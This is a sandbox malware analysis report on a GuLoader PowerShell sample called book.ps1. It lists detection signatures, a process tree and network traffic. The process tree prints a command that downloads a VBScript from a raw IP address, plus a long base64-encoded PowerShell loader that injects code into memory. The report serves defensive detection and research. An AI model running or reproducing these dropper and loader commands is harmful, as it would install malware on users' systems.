Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
book.ps1

Overview

General Information

Sample Name:book.ps1
Analysis ID:623683
MD5:10c1a6b6135d5f641ed56cfde0da1967
SHA1:dbf7d6327c2bf13f3ae772f6eaaa1c0a5fc5473e
SHA256:75de1e1b097579bf1a18c494042b16192a969dfb0fb9cdb3759d362b7b4b6a5f
Tags:Guloaderps1
Infos:

Detection

GuLoader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
Encrypted powershell cmdline option found
Very long command line found
Potential dropper URLs found in powershell memory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Drops PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 3144 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\book.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs MD5: 95000560239032BC68B4C2FDFCDEF913)
    • wscript.exe (PID: 6948 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Sursdepa.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
      • powershell.exe (PID: 6276 cmdline: C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAGUAbgBhAHQAZQByAGYAbwA9ACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVABJAE8ATABPAEcAIgApAC4AQQBjAGUAdABhAG0AaQBkAHAAaAAyAA0ACgANAAoAJABVAHQAaQBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBCAHkAdABlAFsAXQBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBdACwAJABTAGUAbgBhAHQAZQByAGYAbwAuAEwAZQBuAGcAdABoACAALwAgADIAKQANAAoADQAKAA0ACgANAAoARgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAUwBlAG4AYQB0AGUAcgBmAG8ALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAPQAyACkADQAKAAkAewANAAoAIAAgACAAIAAgACAAIAAgACQAVQB0AGkAbABbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAFMAZQBuAGEAdABlAHIAZgBvAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkADQAKACAAIAAgACAAfQANAAoADQAKAA0ACgBmAG8AcgAoACQAYwBvAG4AYwBvAG0AaQB0AGEAPQAwADsAIAAkAGMAbwBuAGMAbwBtAGkAdABhACAALQBsAHQAIAAkAFUAdABpAGwALgBjAG8AdQBuAHQAIAA7ACAAJABjAG8AbgBjAG8AbQBpAHQAYQArACsAKQANAAoAewANAAoACQANAAoAWwBIAGUAeABhAHMAdABpAGMAaAAxAF0AOgA6AFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKAAkAEgAZQB4AGEAcwB0AGkAYwBoADMAKwAkAGMAbwBuAGMAbwBtAGkAdABhACwAWwByAGUAZgBdACQAVQB0AGkAbABbACQAYwBvAG4AYwBvAG0AaQB0AGEAXQAsADEAKQANAAoADQAKAH0ADQAKAFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAEgAZQB4AGEAcwB0AGkAYwBoADMALAAgADAAKQANAAoADQAKAA0ACgA= MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • csc.exe (PID: 5752 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
          • cvtres.exe (PID: 1280 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5295.tmp" "c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.544284081.0000000009290000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: http://46.4.198.55Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbshAvira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbsAvira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsAvira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs0yjAvira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vAvira URL Cloud: Label: malware
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

    Networking

    barindex
    Potential dropper URLs found in powershell memory
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery8Q1
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
    Source: powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryX
    Source: global trafficHTTP traffic detected: GET /10P/Sursdepa.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 46.4.198.55Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55
    Source: powershell.exe, 00000003.00000002.292149897.00000167E848D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.v
    Source: powershell.exe, 00000003.00000002.295924482.00000167E855C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282562516.00000167E5B18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282734936.00000167E5D20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.283365528.00000167E7941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282654233.00000167E5B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs
    Source: powershell.exe, 00000003.00000002.282555129.00000167E5B10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282734936.00000167E5D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs
    Source: powershell.exe, 00000003.00000002.301030775.00000167FFDE7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281332697.00000167FFDE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$
    Source: powershell.exe, 00000003.00000002.282784282.00000167E5E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~
    Source: powershell.exe, 00000003.00000002.283365528.00000167E7941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs0yj
    Source: powershell.exe, 00000003.00000002.282562516.00000167E5B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbsh
    Source: powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55x
    Source: powershell.exe, 00000001.00000002.335374156.00000211CEF07000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.300317707.00000167FFBBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281232280.00000167FFBBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.528421591.0000000002D8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000001.00000002.323271463.00000211B7732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
    Source: powershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000001.00000002.318892077.00000211B6EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282944131.00000167E7731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000003.00000002.298249127.00000167E8C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000003.00000002.300436047.00000167FFC19000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281286699.00000167FFC19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
    Source: powershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: global trafficHTTP traffic detected: GET /10P/Sursdepa.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 46.4.198.55Connection: Keep-Alive

    System Summary

    barindex
    Wscript starts Powershell (via cmd or directly)
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGU